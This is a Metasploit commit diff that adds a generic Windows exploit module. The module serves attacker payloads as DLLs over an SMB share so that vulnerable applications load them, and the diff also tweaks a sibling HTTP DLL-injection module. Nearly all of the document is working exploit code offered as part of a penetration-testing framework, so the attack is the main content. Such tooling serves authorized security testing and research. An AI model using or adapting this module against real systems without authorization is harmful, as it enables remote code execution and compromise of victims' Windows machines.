Land rapid7#3294, @0x41414141's generic dll injection through SMB shared folder

jvazquez-r7 · jvazquez-r7 · commit b9a30d60d47c · 2015-03-04T16:42:24.000-06:00
diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb
@@ -17,7 +17,7 @@ def initialize(info={})
       'Name'           => 'Generic Web Application DLL Injection',
       'Description'    => %q{
         This is a general-purpose module for exploiting conditions where a HTTP request
-        triggers a DLL load from a specified SMB share. This module serves payloads as
+        triggers a DLL load from an specified SMB share. This module serves payloads as
         DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
         trigger the load of the DLL.
       },
@@ -29,6 +29,11 @@ def initialize(info={})
       'Privileged'     => false,
       'Arch'           => [ARCH_X86, ARCH_X86_64],
       'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
       'References'     =>
         [
           ['CWE', '427']
diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb
@@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Generic DLL Injection From Shared Resource',
+      'Description'   => %q{
+        This is a general-purpose module for exploiting conditions where a DLL can be loaded
+        from an specified SMB share. This module serves payloads as DLLs over an SMB service.
+      },
+      'Author'      =>
+        [
+          'Matthew Hall <hallm[at]sec-1.com>'
+        ],
+      'References'     =>
+        [
+          ['CWE', '114']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 04 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def setup
+    super
+
+    self.file_contents = generate_payload_dll
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+    print_status("File available on #{unc}...")
+  end
+
+end
